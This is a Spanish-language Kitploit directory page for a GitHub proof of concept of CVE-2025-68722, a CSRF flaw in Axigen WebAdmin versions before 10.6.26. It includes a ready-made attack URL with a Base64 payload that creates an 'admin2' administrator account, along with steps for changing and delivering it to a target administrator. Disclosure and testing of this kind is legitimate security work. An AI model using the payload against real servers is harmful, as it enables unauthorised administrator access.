Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-68722 — Axigen WebAdmin CSRF Vulnerability | Kitploit
Herramientas/GitHubGitHub/osmancanvural/cve-2025-68722
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingPapers & ResearchLearning & Education
GitHubosmancanvural/cve-2025-68722

CVE-2025-68722

Axigen WebAdmin CSRF Vulnerability

Ver Repositorio
hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-68722: Axigen WebAdmin CSRF

Resumen de la vulnerabilidad

Acciones críticas que cambian el estado en la interfaz Axigen WebAdmin son accesibles mediante solicitudes GET. Si bien el token _h protege contra el CSRF directo, la aplicación procesa solicitudes en cola a través del parámetro _s (breadcrumb) inmediatamente después de que un usuario se autentica.

Un atacante puede crear una URL que contenga una carga útil codificada en Base64 en el parámetro _s. Si un administrador hace clic en este enlace y completa el proceso de inicio de sesión, la acción en cola se ejecuta automáticamente en su contexto.

Versiones afectadas: < 10.6.26

Para más información, consulta la Base de conocimientos de Axigen.


POC

URL objetivo: https://{axigen-domain}:9443/?_h=invalid&_s=eyJwYWdlIjoiYXVzciIsInBhcmFtcyI6eyJhY3Rpb24iOiJhZGQiLCAidXNlcm5hbWVfaW5wdXQiOiJhZG1pbjIiLCAicGFzc3dvcmRfaW5wdXQiOiJhZG1pbjIiLCAiZGlzcGxheV9uYW1lX2lucHV0IjoiYWRtaW4yIn19

Carga útil decodificada (parámetro _s):

root@kitploit:~
{"page":"ausr","params":{"action":"add", "username_input":"admin2", "password_input":"admin2", "display_name_input":"admin2"}}

Pasos para reproducir:

  1. Modificar: Cambia la carga útil JSON para apuntar a diferentes acciones administrativas (por ejemplo, cambiar la configuración del servidor).
  2. Codificar: Vuelve a codificar el JSON modificado en Base64.
  3. Entregar: Reemplaza el valor del parámetro _s en la URL de ataque y entrégala a un administrador objetivo.
  4. Activar: Al iniciar sesión a través de este enlace, se crea la cuenta admin2 (o se ejecuta tu acción personalizada).

Descargar herramienta